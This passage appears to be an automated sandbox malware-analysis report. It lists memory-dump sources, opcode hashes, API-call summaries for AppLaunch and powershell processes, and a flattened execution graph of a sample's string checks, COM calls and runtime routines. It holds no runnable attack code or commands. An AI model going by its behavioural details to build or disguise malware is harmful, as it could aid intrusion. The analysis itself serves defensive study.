                            • Opcode Fuzzy Hash: a41143180313269df11d11109604c9858e673766f8cb936fc93820ba65fe1b89
                            • Instruction Fuzzy Hash: 9FF0E273A0802A0BD72CE92889954F9B7E7D780300B12427AD807DB2D5DC24AD004780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 059c10c15cb1fe9d93c41b29b643d865128fe94236d38b897e044c7576e9fa0c
                            • Instruction ID: d3b19ef540fd732fa729260a1735ef9bb507fcce2793d500b53de0cab9d58918
                            • Opcode Fuzzy Hash: 059c10c15cb1fe9d93c41b29b643d865128fe94236d38b897e044c7576e9fa0c
                            • Instruction Fuzzy Hash: 70E09209B78D4B1BDAD4BB79609977DB0D29F89204B9144BAB40FD36C7DD6CAC420215
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a066b6aee324048a637644da3a89db5c1780da2370ce77bc3aec7a5ced127b05
                            • Instruction ID: 48ba3f59a101bb6b5ea05ccb95f5c4640efd02fe9c08f8b06f0905b595dfb355
                            • Opcode Fuzzy Hash: a066b6aee324048a637644da3a89db5c1780da2370ce77bc3aec7a5ced127b05
                            • Instruction Fuzzy Hash: D4F02B336180174BD318EE1DC89046073D1FB5532071003FAE487CB2E2DD58F9528680
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 10a0ae0e0a360f452aa97aa48876c07fbff6ca99695830dddfbfc9b7f0e6288b
                            • Instruction ID: 3a830baf4a329de3b0a774fd0b5fbd88bbba5a1a79a06c9b7d337c92355b03fd
                            • Opcode Fuzzy Hash: 10a0ae0e0a360f452aa97aa48876c07fbff6ca99695830dddfbfc9b7f0e6288b
                            • Instruction Fuzzy Hash: 97F0E535B1564B8BD325EE68C5848A6B3A3E7D4360B14C6BEC107CB7D8EE38F449D680
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:14.7%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:73
                            Total number of Limit Nodes:1

                            Control-flow Graph

                            APIs
                            • OleInitialize.OLE32(00000000), ref: 09417525
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: Initialize
                            • String ID: d!
                            • API String ID: 2538663250-4126614057
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09418360,07CC6D30,06D54CF0), ref: 094183F1
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: EnumThreadWindows
                            • String ID:
                            • API String ID: 2941952884-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNELBASE(?), ref: 05329997
                            Memory Dump Source
                            • Source File: 00000005.00000002.511110883.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_5320000_AppLaunch.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNELBASE(?), ref: 05329997
                            Memory Dump Source
                            • Source File: 00000005.00000002.511110883.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_5320000_AppLaunch.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,0941589D,?,?,?), ref: 0941878D
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: Message
                            • String ID:
                            • API String ID: 2030045667-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09416727
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09418360,07CC6D30,06D54CF0), ref: 094183F1
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: EnumThreadWindows
                            • String ID:
                            • API String ID: 2941952884-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09418360,07CC6D30,06D54CF0), ref: 094183F1
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: EnumThreadWindows
                            • String ID:
                            • API String ID: 2941952884-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09416727
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,0941589D,?,?,?), ref: 0941878D
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: Message
                            • String ID:
                            • API String ID: 2030045667-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • OleInitialize.OLE32(00000000), ref: 09417525
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: Initialize
                            • String ID:
                            • API String ID: 2538663250-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.510578628.000000000518D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0518D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_518d000_AppLaunch.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.510578628.000000000518D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0518D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_518d000_AppLaunch.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.510578628.000000000518D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0518D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_518d000_AppLaunch.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.510578628.000000000518D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0518D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_518d000_AppLaunch.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.304415183.00007FFF7E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E4C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e4c0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.304415183.00007FFF7E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E4C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e4c0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage: 7.3%
                            Dynamic/Decrypted Code Coverage: 0%
                            Signature Coverage: 3.2%
                            Total number of Nodes: 1430
                            Total number of Limit Nodes: 14
lstrlenW 5949->5952 5953 14000191e StrStrIW 5950->5953 5951->5947 5954 1400020ac 35 API calls 5952->5954 5953->5949 5953->5950 5955 140001961 5954->5955 5956 1400019a0 StrStrIW 5955->5956 5959 140004018 16 API calls 5955->5959 5957 1400019e3 5956->5957 5958 1400019b5 5956->5958 5960 1400019eb lstrlenW 5957->5960 5962 1400019ce StrStrIW 5958->5962 5959->5955 5961 1400020ac 35 API calls 5960->5961 5963 140001a11 5961->5963 5962->5957 5962->5958 5964 140001a50 StrStrIW 5963->5964 5967 140004018 16 API calls 5963->5967 5965 140001a93 5964->5965 5966 140001a65 5964->5966 5968 140001a9b lstrlenW 5965->5968 5970 140001a7e StrStrIW 5966->5970 5967->5963 5969 1400020ac 35 API calls 5968->5969 5971 140001ac1 5969->5971 5970->5965 5970->5966 5972 140001b00 StrStrIW 5971->5972 5975 140004018 16 API calls 5971->5975 5973 140001b43 5972->5973 5974 140001b15 5972->5974 5976 140001b4b lstrlenW 5973->5976 5977 140001b2e StrStrIW 5974->5977 5975->5971 5978 1400020ac 35 API calls 5976->5978 5977->5973 5977->5974 5979 140001b71 5978->5979 5980 140001bb0 StrStrIW 5979->5980 5983 140004018 16 API calls 5979->5983 5981 140001bf3 5980->5981 5982 140001bc5 5980->5982 5984 140001bfb lstrlenW 5981->5984 5985 140001bde StrStrIW 5982->5985 5983->5979 5986 1400020ac 35 API calls 5984->5986 5985->5981 5985->5982 5987 140001c21 5986->5987 5988 140001c60 StrStrIW 5987->5988 5991 140004018 16 API calls 5987->5991 5989 140001ca3 5988->5989 5990 140001c75 5988->5990 5993 140002080 _handle_error 6 API calls 5989->5993 5992 140001c8e StrStrIW 5990->5992 5991->5987 5992->5989 5992->5990 5994 140001133 5993->5994 5994->5338 5996 14000204a 5995->5996 5997 140001fea CoCreateInstance 5995->5997 5998 140002080 _handle_error 6 API calls 5996->5998 5999 14000203f CoUninitialize 5997->5999 6001 140002020 5997->6001 6000 14000114f 5998->6000 5999->5996 6002 140001ce0 CoInitialize 6000->6002 6001->5999 6003 140001eb9 6002->6003 6004 140001d1c CoCreateInstance 6002->6004 6005 140002080 _handle_error 6 API calls 
6003->6005 6006 140001eab CoUninitialize 6004->6006 6008 140001d58 6004->6008 6007 140001165 6005->6007 6006->6003 6007->5344 6009 140001ee0 CoInitialize 6007->6009 6008->6006 6010 140001f98 6009->6010 6011 140001f0e CoCreateInstance 6009->6011 6013 140002080 _handle_error 6 API calls 6010->6013 6012 140001f8d CoUninitialize 6011->6012 6015 140001f44 6011->6015 6012->6010 6014 140001fa7 6013->6014 6014->5344 6015->6012 6017 140004106 6016->6017 6019 140004116 6016->6019 6018 140006090 _set_errno_from_matherr 5 API calls 6017->6018 6020 14000410b 6018->6020 6019->5869 6021 140005f70 _invalid_parameter_noinfo 5 API calls 6020->6021 6021->6019 6023 1400020b4 6022->6023 6024 1400020d8 6023->6024 6025 140004220 _invalid_parameter_noinfo EnterCriticalSection 6023->6025 6026 1400020de 6023->6026 6024->5875 6025->6023 6027 1400020e9 6026->6027 6047 140002744 6026->6047 6051 140002764 6027->6051 6030 1400020ef 6055 140004e78 6030->6055 6032 14000210c 6061 140002820 6032->6061 6034 140002b10 __scrt_fastfail 5 API calls 6036 1400021a5 6034->6036 6035 140002124 _RTC_Initialize 6042 140002179 6035->6042 6066 1400029d0 6035->6066 6036->5875 6038 140002139 6069 1400046c4 6038->6069 6040 140002145 6040->6042 6100 140004f64 6040->6100 6042->6034 6043 140002195 6042->6043 6043->5875 6045 140005ab4 16 API calls 6044->6045 6046 140004021 6045->6046 6046->5883 6048 140002752 std::bad_alloc::bad_alloc 6047->6048 6107 140003284 6048->6107 6050 140002763 6052 140002772 std::bad_alloc::bad_alloc 6051->6052 6053 140003284 Concurrency::cancel_current_task 2 API calls 6052->6053 6054 140002783 6053->6054 6054->6030 6056 140004e89 6055->6056 6057 140004e91 6056->6057 6058 140006090 _set_errno_from_matherr 5 API calls 6056->6058 6057->6032 6059 140004ea0 6058->6059 6060 140005f70 _invalid_parameter_noinfo 5 API calls 6059->6060 6060->6057 6062 140002831 6061->6062 6063 140002836 __scrt_release_startup_lock 6061->6063 6062->6063 6064 140002b10 __scrt_fastfail 5 API calls 6062->6064 6063->6035 
6065 1400028aa 6064->6065 6112 140002994 6066->6112 6068 1400029d9 6068->6038 6070 1400046e4 6069->6070 6079 1400046fb 6069->6079 6071 140004702 6070->6071 6072 1400046ec 6070->6072 6074 140007c1c 25 API calls 6071->6074 6073 140006090 _set_errno_from_matherr 5 API calls 6072->6073 6075 1400046f1 6073->6075 6076 140004707 6074->6076 6077 140005f70 _invalid_parameter_noinfo 5 API calls 6075->6077 6163 1400073d0 GetModuleFileNameW 6076->6163 6077->6079 6079->6040 6085 140004791 6088 1400044a0 16 API calls 6085->6088 6086 140004779 6087 140006090 _set_errno_from_matherr 5 API calls 6086->6087 6089 14000477e 6087->6089 6092 1400047ad 6088->6092 6090 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6089->6090 6090->6079 6091 1400047b3 6093 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6091->6093 6092->6091 6094 1400047f8 6092->6094 6095 1400047df 6092->6095 6093->6079 6098 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6094->6098 6096 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6095->6096 6097 1400047e8 6096->6097 6099 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6097->6099 6098->6091 6099->6079 6101 140005ab4 16 API calls 6100->6101 6102 140004f71 6101->6102 6103 140004fa5 6102->6103 6104 140006090 _set_errno_from_matherr 5 API calls 6102->6104 6103->6042 6105 140004f9a 6104->6105 6106 140005f70 _invalid_parameter_noinfo 5 API calls 6105->6106 6106->6103 6108 1400032c0 RtlPcToFileHeader 6107->6108 6109 1400032a3 6107->6109 6110 1400032e7 RaiseException 6108->6110 6111 1400032d8 6108->6111 6109->6108 6110->6050 6111->6110 6113 1400029ae 6112->6113 6115 1400029a7 6112->6115 6116 1400053d4 6113->6116 6115->6068 6119 140005020 6116->6119 6118 140005416 6118->6115 6120 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6119->6120 6121 14000503c 6120->6121 6124 140005098 6121->6124 6123 140005045 6123->6118 6126 1400050c4 
6124->6126 6133 140005159 6124->6133 6125 140005135 6128 140009048 7 API calls 6125->6128 6125->6133 6126->6125 6126->6133 6134 140009048 6126->6134 6130 14000514f 6128->6130 6129 14000512b 6131 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6129->6131 6132 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6130->6132 6131->6125 6132->6133 6133->6123 6135 140009087 6134->6135 6136 14000906a 6134->6136 6140 140009091 6135->6140 6143 14000a8e4 6135->6143 6136->6135 6137 140009078 6136->6137 6138 140006090 _set_errno_from_matherr 5 API calls 6137->6138 6142 14000907d __scrt_fastfail 6138->6142 6151 14000a920 6140->6151 6142->6129 6144 14000a906 HeapSize 6143->6144 6145 14000a8ed 6143->6145 6150 14000e0e8 6144->6150 6146 140006090 _set_errno_from_matherr 5 API calls 6145->6146 6147 14000a8f2 6146->6147 6148 140005f70 _invalid_parameter_noinfo 5 API calls 6147->6148 6149 14000a8fd 6148->6149 6149->6140 6152 14000a935 6151->6152 6153 14000a93f 6151->6153 6154 1400067e0 FreeLibrary GetProcAddress TlsSetValue EnterCriticalSection HeapFree 6152->6154 6155 14000a944 6153->6155 6161 14000a94b _invalid_parameter_noinfo 6153->6161 6158 14000a93d 6154->6158 6159 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6155->6159 6156 14000a951 6160 140006090 _set_errno_from_matherr 5 API calls 6156->6160 6157 14000a97e HeapReAlloc 6157->6158 6157->6161 6158->6142 6159->6158 6160->6158 6161->6156 6161->6157 6162 140004220 _invalid_parameter_noinfo EnterCriticalSection 6161->6162 6162->6161 6164 140007416 try_get_function 6163->6164 6165 14000742a 6163->6165 6185 140006020 6164->6185 6166 14000405c 16 API calls 6165->6166 6167 140007458 6166->6167 6190 1400072bc 6167->6190 6169 140007423 6171 140002080 _handle_error 6 API calls 6169->6171 6172 14000471e 6171->6172 6173 1400044a0 6172->6173 6175 1400044de 6173->6175 6174 140007fcc 16 API calls 6174->6175 6175->6174 6177 140004544 6175->6177 6176 140004637 6179 140004664 
6176->6179 6177->6176 6178 140007fcc 16 API calls 6177->6178 6178->6177 6180 14000467c 6179->6180 6184 1400046b4 6179->6184 6181 140006840 _invalid_parameter_noinfo 5 API calls 6180->6181 6180->6184 6182 1400046aa 6181->6182 6183 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6182->6183 6183->6184 6184->6085 6184->6086 6186 140005c30 _invalid_parameter_noinfo 5 API calls 6185->6186 6187 140006031 6186->6187 6188 140005c30 _invalid_parameter_noinfo 5 API calls 6187->6188 6189 14000604a Concurrency::details::SchedulerProxy::DeleteThis 6188->6189 6189->6169 6191 1400072f9 6190->6191 6198 1400072e0 6190->6198 6192 140008064 WideCharToMultiByte 6191->6192 6197 1400072fe 6191->6197 6193 140007351 6192->6193 6194 140007358 try_get_function 6193->6194 6196 140007381 6193->6196 6193->6197 6194->6198 6200 140006020 5 API calls 6194->6200 6195 140006090 _set_errno_from_matherr 5 API calls 6195->6198 6199 140008064 WideCharToMultiByte 6196->6199 6197->6195 6197->6198 6198->6169 6199->6194 6201 140007365 6200->6201 6202 140006090 _set_errno_from_matherr 5 API calls 6201->6202 6202->6198 6204 140005ab4 16 API calls 6203->6204 6205 14000559d 6204->6205 6206 140005614 16 API calls 6205->6206 6207 1400055b3 6206->6207 6508 140005454 6511 140004a3c 6508->6511 6518 140004a04 6511->6518 6516 1400049c0 5 API calls 6517 140004a64 6516->6517 6519 140004a14 6518->6519 6520 140004a19 6518->6520 6521 1400049c0 5 API calls 6519->6521 6522 140004a20 6520->6522 6521->6520 6523 140004a35 6522->6523 6524 140004a30 6522->6524 6523->6516 6525 1400049c0 5 API calls 6524->6525 6525->6523 6550 140009894 6551 14000989f 6550->6551 6559 14000b6e4 6551->6559 6553 1400098a4 6566 14000b798 6553->6566 6556 1400098d5 6557 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6556->6557 6558 1400098e1 6557->6558 6560 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6559->6560 6565 14000b6fd 6560->6565 6561 14000b77c 6561->6553 6562 
14000b747 DeleteCriticalSection 6564 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6562->6564 6564->6565 6565->6561 6565->6562 6570 14000bbb4 6565->6570 6567 1400098b6 DeleteCriticalSection 6566->6567 6568 14000b7ab 6566->6568 6567->6553 6567->6556 6568->6567 6569 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6568->6569 6569->6567 6571 14000bbcb 6570->6571 6575 14000bbe9 6570->6575 6572 140006090 _set_errno_from_matherr 5 API calls 6571->6572 6573 14000bbd0 6572->6573 6574 140005f70 _invalid_parameter_noinfo 5 API calls 6573->6574 6577 14000bbdb 6574->6577 6575->6577 6578 14000bb30 6575->6578 6577->6565 6579 14000bb42 6578->6579 6580 14000bb57 6578->6580 6581 140006090 _set_errno_from_matherr 5 API calls 6579->6581 6586 14000bb52 6580->6586 6594 1400096a4 6580->6594 6583 14000bb47 6581->6583 6585 140005f70 _invalid_parameter_noinfo 5 API calls 6583->6585 6585->6586 6586->6577 6587 14000b798 5 API calls 6588 14000bb73 6587->6588 6600 140009a90 6588->6600 6593 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6593->6586 6595 1400096c1 6594->6595 6596 1400096ef 6594->6596 6595->6596 6597 140009a90 5 API calls 6595->6597 6596->6587 6598 1400096e2 6597->6598 6621 14000b31c 6598->6621 6601 140009a99 6600->6601 6605 140009aa9 6600->6605 6602 140006090 _set_errno_from_matherr 5 API calls 6601->6602 6603 140009a9e 6602->6603 6604 140005f70 _invalid_parameter_noinfo 5 API calls 6603->6604 6604->6605 6606 14000c550 6605->6606 6607 14000c575 6606->6607 6608 14000c560 6606->6608 6610 14000c5d1 6607->6610 6615 14000c5a4 6607->6615 6609 140006070 5 API calls 6608->6609 6612 14000c565 6609->6612 6611 140006070 5 API calls 6610->6611 6613 14000c5d6 6611->6613 6614 140006090 _set_errno_from_matherr 5 API calls 6612->6614 6617 140006090 _set_errno_from_matherr 5 API calls 6613->6617 6618 14000bb82 6614->6618 6751 14000c4dc 6615->6751 6619 14000c5de 6617->6619 6618->6586 6618->6593 6620 140005f70 
_invalid_parameter_noinfo 5 API calls 6619->6620 6620->6618 6622 14000b345 6621->6622 6626 14000b35d 6621->6626 6641 140006070 6622->6641 6624 14000b3d4 6627 140006070 5 API calls 6624->6627 6626->6624 6629 14000b38e 6626->6629 6630 14000b3d9 6627->6630 6628 140006090 _set_errno_from_matherr 5 API calls 6640 14000b352 6628->6640 6633 14000b3a5 6629->6633 6634 14000b3ba 6629->6634 6631 140006090 _set_errno_from_matherr 5 API calls 6630->6631 6632 14000b3e1 6631->6632 6635 140005f70 _invalid_parameter_noinfo 5 API calls 6632->6635 6637 140006090 _set_errno_from_matherr 5 API calls 6633->6637 6644 14000b408 6634->6644 6635->6640 6638 14000b3aa 6637->6638 6639 140006070 5 API calls 6638->6639 6639->6640 6640->6596 6642 140005c30 _invalid_parameter_noinfo 5 API calls 6641->6642 6643 140006079 6642->6643 6643->6628 6645 14000b431 6644->6645 6682 14000b44e 6644->6682 6646 14000b436 6645->6646 6648 14000b487 6645->6648 6647 140006070 5 API calls 6646->6647 6649 14000b43b 6647->6649 6650 14000b49d 6648->6650 6686 14000baec 6648->6686 6651 140006090 _set_errno_from_matherr 5 API calls 6649->6651 6696 14000b7d8 6650->6696 6654 14000b443 6651->6654 6655 140005f70 _invalid_parameter_noinfo 5 API calls 6654->6655 6655->6682 6657 14000b5b6 6658 14000b617 WriteFile 6657->6658 6659 14000b5c8 6657->6659 6683 14000b588 try_get_function 6658->6683 6661 14000b5d1 6659->6661 6662 14000b603 6659->6662 6660 140005ab4 16 API calls 6663 14000b4ce 6660->6663 6665 14000b5d6 6661->6665 6666 14000b5ef 6661->6666 6728 14000af8c 6662->6728 6663->6657 6668 14000b4f4 GetConsoleMode 6663->6668 6665->6683 6715 14000b090 6665->6715 6721 14000b1ac 6666->6721 6668->6657 6669 14000b516 6668->6669 6671 14000b598 6669->6671 6684 14000b51b 6669->6684 6704 14000aabc GetConsoleCP 6671->6704 6672 14000b68c 6677 140006090 _set_errno_from_matherr 5 API calls 6672->6677 6672->6682 6673 14000b67c 6676 140006020 5 API calls 6673->6676 6675 140006090 _set_errno_from_matherr 5 API calls 6678 14000b671 6675->6678 
